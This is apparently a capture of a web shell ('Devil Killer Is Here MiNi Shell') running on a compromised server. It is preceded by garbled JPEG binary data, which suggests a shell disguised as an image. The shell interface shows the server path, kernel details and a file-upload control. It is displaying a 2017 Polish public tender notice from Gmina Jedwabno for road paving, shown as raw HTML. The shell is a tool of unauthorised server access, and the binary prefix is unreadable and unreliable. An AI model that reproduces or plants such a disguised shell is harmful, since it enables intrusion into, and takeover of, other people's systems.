JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20171120/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20171120/618525-N-2017.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 618525-N-2017 z dnia 2017-11-20 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Gmina Jedwabno</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Doprowadzenie do należytego stanu technicznego ciągów komunikacyjnych na działkach nr 5/9, 5/20 w miejscowości Dzierzki</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Roboty budowlane</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Gmina Jedwabno</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">53562300000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. Warmińska</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">2</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">12122 </span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Jedwabno</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">warmińsko-mazurskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">(89) 621-30-80</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">ug@jedwabno.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">(89) 621-30-94</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">http://www.jedwabno.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja samorządowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">http://bip.jedwabno.pl</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">http://bip.jedwabno.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">pisemnie</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Urząd Gminy w Jedwabnie, Warmińska 2, 12-122 Jedwabno</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Doprowadzenie do należytego stanu technicznego ciągów komunikacyjnych na działkach nr 5/9, 5/20 w miejscowości Dzierzki</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">RP.271.3.2017.RB</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Roboty budowlane</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Nie</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski"></span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu"> 1.Przedmiotem zamówienia jest Doprowadzenie do należytego stanu technicznegociągów komunikacyjnych na działkach nr 5/9, 5/20 w miejscowości Dzierzki. Przedmiot zamówienianazwany jest w dalszej części SIWZ ,,przedmiotem zamówienia". 2.Przedmiot zamówienia obejmujew szczególności: 1)Roboty przygotowawcze 2)Zabezpieczenie kabla telefonicznego 3)Roboty ziemne4)Podbudowa 5)Krawężniki 6)Nawierzchnia z kostki brukowej betonowej 3.Szczegółowy opisprzedmiotu zamówienia w niniejszym postępowaniu został zawarty w dokumentacji projektowej,Specyfikacjach Technicznych Wykonania i Odbioru Robót Budowlanych (STWiORB), przedmiarzerobót, SIWZ, wzorze umowy wraz z załącznikami. 4.Wykonawca wykona przedmiot zamówienia napodstawie dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robótbudowlanych (STWiORB), SIWZ wraz z załącznikami, pytaniami i odpowiedziami udzielonymi w trakcie procedury o udzielenie zamówienia publicznego oraz przedmiarem robót, a także,obowiązującymi przepisami szczegółowymi i sztuką budowlaną, oraz zapewni niezbędną obsługęgeodezyjną wraz z okresem gwarancji i rękojmi. Przedmiar stanowi tylko materiał pomocniczy.5.Kody dotyczące przedmiotu zamówienia określone we Wspólnym Słowniku Zamówień: CPV:45.23.32.50-6; 6. Realizacja zamówienia podlega prawu polskiemu, w tym w szczególności ustawie zdnia 7 lipca 1994 r. Prawo budowlane. 7.W przypadku wskazania w dokumentacji projektowej,STWIORB, przedmiarach, SIWZ znaków towarowych, patentów lub pochodzenia, a także norm,aprobat technicznych oraz systemów odniesienia, Zamawiający dopuszcza zaoferowanie rozwiązańrównoważnych w stosunku do wskazanych w dokumentacji projektowej, STWIORB, przedmiarachoraz SIWZ pod warunkiem, że zagwarantują one realizację robót w zgodzie z dokumentacjęprojektową, STWiORB, przedmiarach, zapewnią uzyskanie parametrów technicznych nie gorszych odzałożonych w dokumentacji projektowej, STWIORB, przedmiarach, oraz SIWZ oraz będą zgodne podwzględem: a)gabarytów i konstrukcji (wielkość, rodzaj, właściwości fizyczne oraz liczba elementówskładowych) b)charakteru użytkowego (tożsamość funkcji) c)charakterystyki materiałowej (rodzaj ijakość materiałów) d)parametrów technicznych (wytrzymałość, trwałość, dane techniczne, itd.)e)parametrów bezpieczeństwa użytkowania Wykonawca, który powołuje się na rozwiązaniarównoważne opisane przez Zamawiającego, jest obowiązany wykazać, że oferowane przez niego wramach przedmiotu zamówienia materiały, elementy, systemy spełniają wymagania określone przezZamawiającego. 8.Zamawiający informuje, że zgodnie z art. 30 ust. 8 ustawy Pzp wymagania, októrych mowa w przywołanym przepisie, Zamawiający określił w Specyfikacjach TechnicznychWykonania i Odbioru Robót Budowlanych, stanowiących załącznik do SIWZ. W przywołanych wopisie przedmiotu zamówienia norm, aprobat, specyfikacji technicznych i systemów odniesienia, októrych mowa w art. 30 ust. 1 - 3 ustawy Pzp Zamawiający dopuszcza rozwiązania równoważneopisywanym w ww. dokumentach. 9.Zamawiający żąda wskazania przez Wykonawcę częścizamówienia, których wykonanie zamierza powierzyć podwykonawcom i podania przez Wykonawcęfirm podwykonawców. 10.Stosownie do treści art. 29 ust. 3a ustawy Pzp, w związku z art. 36 ust. 2 pkt8a ustawy Pzp, Zamawiający wymaga, aby osoby wykonujące czynności w zakresie realizacjizamówienia, polegające na bezpośrednim fizycznym świadczeniu robót budowlanych i usług (wszczególności zagęszczanie, przywiezienie materiałów, wyrównywanie dróg, układanie nawierzchni,operowanie sprzętem budowlanym) zatrudnione były przez Wykonawcę lub Podwykonawcę napodstawie umowy o pracę zgodnie z ustawą z dnia 26 czerwca 1974 r. - Kodeks pracy (Dz. U. z 2016r., poz. 1666 z późn. zm.) 11.Sposób dokumentowania zatrudnienia osób, o których mowa wyżej orazuprawnienia zamawiającego w zakresie kontroli spełniania przez Wykonawcę wymagań, o którychmowa wyżej oraz sankcji z tytułu niespełnienia tych wymagań zostały zawarte w załączniku nr 6 wzorze umowy 12.Zamawiający przewiduje możliwość udzielenia zamówienia o którym mowa w art.67 ust. 1 pkt 6 ustawy Prawo zamówień publicznych: a)w okresie 3 lat od dnia udzielenia zamówieniapodstawowego dotychczasowemu wykonawcy zamówienia, polegającego na powtórzeniu podobnychrobót budowlanych, o których mowa w przedmiarze robót poz. 1 roboty przygotowawcze, poz. 3Roboty ziemne, poz. 4 podbudowa, poz. 5 krawężniki, poz. 6 nawierzchnia z kostki brukowejbetonowej, w wysokości 30%, b)wartość zamówienia powtórzonego zostanie ustalona po negocjacjachz wykonawcą, wybranym w niniejszym postepowaniu, z zastrzeżeniem, że ceny jednostkowe nie będąwyższe niż ceny zaoferowane w niniejszym postępowaniu, c)zamówienia powtórzone zostanąudzielone na warunkach analogicznych do warunków określonych w niniejszym postępowaniu(dotyczy również kryteriów oceny ofert), zamówienie powtórzone zostanie udzielone w przypadkuposiadania środków finansowych - w ramach kontynuacji przedsięwzięcia opisanego w SpecyfikacjiIstotnych Warunków Zamówienia i zgodnie ze sposobem realizacji zawartym w SIWZ i wzorzeumowy wraz z załącznikami</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">45233250-6</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Tak</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst">Zamawiający przewiduje możliwość udzielenia zamówienia o którym mowa w art. 67 ust. 1 pkt 6ustawy Prawo zamówień publicznych: a)w okresie 3 lat od dnia udzielenia zamówienia podstawowegodotychczasowemu wykonawcy zamówienia, polegającego na powtórzeniu podobnych robótbudowlanych, o których mowa w przedmiarze robót poz. 1 roboty przygotowawcze, poz. 3 Roboty ziemne, poz. 4 podbudowa, poz. 5 krawężniki, poz. 6 nawierzchnia z kostki brukowej betonowej, wwysokości 30%, b)wartość zamówienia powtórzonego zostanie ustalona po negocjacjach zwykonawcą, wybranym w niniejszym postępowaniu, z zastrzeżeniem, że ceny jednostkowe nie będąwyższe niż ceny zaoferowane w niniejszym postępowaniu, c)zamówienia powtórzone zostanąudzielone na warunkach analogicznych do warunków określonych w niniejszym postępowaniu(dotyczy również kryteriów oceny ofert), d)zamówienie powtórzone zostanie udzielone w przypadkuposiadania środków finansowych - w ramach kontynuacji przedsięwzięcia opisanego w SpecyfikacjiIstotnych Warunków Zamówienia i zgodnie ze sposobem realizacji zawartym w SIWZ i wzorzeumowy wraz z załącznikami.</span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2017-12-22</span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">dla uznania że Wykonawca spełnia warunek posiadania doświadczeniazamawiający, żąda by wykonawca wykazał, iż w okresie ostatnich 5 lat, (a jeżeli okres prowadzeniadziałalności jest krótszy, to w tym okresie) przed upływem terminu składania ofert wykonał, conajmniej 1 zadanie odpowiadające swoim rodzajem robotom budowlanym stanowiącym przedmiotzamówienia, z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów na rzeczktórych roboty te zostały Wykonane. Przez ,,zadanie odpowiadające rodzajem robót budowlanychstanowiących przedmiot zamówienia", należy rozumieć budowę lub przebudowę lub remontobiektów drogowych takich jak: drogi, chodniki, place, parkingi, ścieżki rowerowe, o nawierzchni zkostki brukowej betonowej o wartości robót budowlanych min. 50.000,00 zł brutto. Wykonawcazłoży także oświadczenie, że dysponuje wiedzą i doświadczeniem potrzebnym do wykonaniazamówienia. Ocena spełniania warunku nastąpi na podstawie wstępnego oświadczenia zgodnie zZałącznikiem nr 2 do SIWZ, o którym mowa w § VII ust. 1 SIWZ. Następnie na podstawiewypełnionego przez wybranego Wykonawcę załącznika nr 3 do SIWZ ,,Wykazu wykonanychrobót", o którym mowa w §VII ust. 6 pkt 1) SIWZ. Do przedmiotowego załącznika nr 3 należydołączyć dowody potwierdzające, że wykazane roboty zostały wykonane w sposób należyty orazwskazujących, że zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowoukończone. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, żechociaż jeden z nich lub łącznie spełniają w/w warunek</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">Zamawiający uzna warunek za spełniony, jeżeli Wykonawca na czasrealizacji zamówienia będzie dysponował osobami o odpowiednich kwalifikacjach zawodowychniezbędnych do wykonania zamówienia tj. a)Kierownik robót w specjalności drogowej pełniącyjednocześnie rolę kierownika budowy. Minimalne wymagania: -posiadający uprawnienia dowykonywania samodzielnych funkcji technicznych w budownictwie w specjalności drogowej lubinne uprawnienia umożliwiające wykonywanie tych samych czynności, do wykonywania, którychw aktualnym stanie prawnym uprawniają uprawnienia budowlane w/w specjalności umożliwiającezrealizowanie przedmiotowego zamówienia, Ocena spełniania warunku nastąpi na podstawiewstępnego oświadczenia zgodnie z Załącznikiem nr 2 do SIWZ, o którym mowa w §VII ust. 1SIWZ. Następnie na podstawie wypełnionego przez wybranego Wykonawcę Załącznika nr 4 doSIWZ, o którym mowa w §VII ust. 